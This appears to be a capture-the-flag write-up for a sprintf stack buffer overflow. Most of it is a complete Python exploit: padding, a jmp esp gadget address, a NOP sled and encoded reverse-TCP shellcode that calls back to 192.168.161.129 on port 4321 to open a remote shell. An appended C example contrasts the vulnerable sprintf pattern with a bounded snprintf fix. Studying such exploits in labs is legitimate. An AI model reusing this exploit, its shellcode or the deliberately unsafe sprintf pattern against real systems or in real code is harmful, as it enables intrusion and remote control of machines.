The vulnerability occurs when the binary reads 0x1FFF bytes of input from the user and copies them into a buffer with sprintf, which lets us overwrite the return address.
The binary had no NX, and luckily there was a jmp esp gadget we can use to execute our shellcode.
#!/usr/bin/python
from socket import *
from struct import pack
from time import sleep

p = lambda x : pack("<L", x)

# address of the jmp esp gadget in the binary
jmpesp = p(0x80488b0)

#linux/x86/shell_reverse_tcp LHOST : 192.168.161.129 LPORT : 4321
shellcode = ""
shellcode += "\xba\xe8\xd3\x61\xde\xda\xc6\xd9\x74\x24\xf4\x5f\x33\xc9"
shellcode += "\xb1\x12\x31\x57\x12\x83\xc7\x04\x03\xbf\xdd\x83\x2b\x0e"
shellcode += "\x39\xb4\x37\x23\xfe\x68\xd2\xc1\x89\x6e\x92\xa3\x44\xf0"
shellcode += "\x40\x72\xe7\xce\xab\x04\x4e\x48\xcd\x6c\x91\x02\x8c\xed"
shellcode += "\x79\x51\xcf\xfd\x98\xdc\x2e\x4d\x3c\x8f\xe1\xfe\x72\x2c"
shellcode += "\x8b\xe1\xb8\xb3\xd9\x89\x6d\x9b\xae\x21\x1a\xcc\x32\xd8"
shellcode += "\xb4\x9b\x50\x48\x1a\x15\x77\xdc\x97\xe8\xf8"

payload = "echo "
payload += "\x41"*0x76   # padding up to the saved return address
payload += jmpesp        # return into jmp esp
payload += "\x90"*50     # NOP sled; esp points here after the ret
payload += shellcode

s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 9000))
print s.recv(1024)
s.send(payload)
s.close()
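As an added example in C (not the challenge binary's code nor the author's), the bug class described above: a fixed-size stack buffer filled by sprintf from oversized input, beside a bounded snprintf version that reports truncation instead of overflowing. The buffer size of 128 and the "echo " prefix are assumptions; the 0x1FFF input length comes from the write-up.

```c
#include <stdio.h>
#include <string.h>

#define CMD_BUF   128     /* assumed size of the on-stack command buffer */
#define MAX_INPUT 0x1FFF  /* the write-up says the binary reads this much */

/* Vulnerable pattern: sprintf has no idea how large cmd is, so input
 * longer than roughly CMD_BUF bytes runs past the buffer into the saved
 * frame pointer and return address. With NX off, that overwrite is what
 * the jmp esp payload above turns into code execution. Shown for
 * contrast only; not called by the test. */
void handle_line_unsafe(const char *input) {
    char cmd[CMD_BUF];
    sprintf(cmd, "echo %s", input);
    /* ... cmd would be executed here ... */
}

/* Hardened version: bound the write with snprintf and treat truncation
 * as an error rather than silently running a cut-off command.
 * Returns 0 on success, -1 if the formatted line does not fit. */
int format_command(char *dst, size_t dstsz, const char *input) {
    int n = snprintf(dst, dstsz, "echo %s", input);
    if (n < 0 || (size_t)n >= dstsz) {
        dst[0] = '\0';  /* leave nothing half-built behind */
        return -1;
    }
    return 0;
}

/* Constructed input of MAX_INPUT 'A' bytes, matching the payload sizing in
 * the write-up. Returns what format_command reports for it (-1 expected). */
int demo_overlong(void) {
    static char input[MAX_INPUT + 1];
    char dst[CMD_BUF];
    memset(input, 'A', MAX_INPUT);
    input[MAX_INPUT] = '\0';
    return format_command(dst, sizeof dst, input);
}

int main(void) {
    char dst[CMD_BUF];
    printf("short input -> %d (%s)\n", format_command(dst, sizeof dst, "hi"), dst);
    printf("0x1FFF bytes -> %d\n", demo_overlong());
    return 0;
}
```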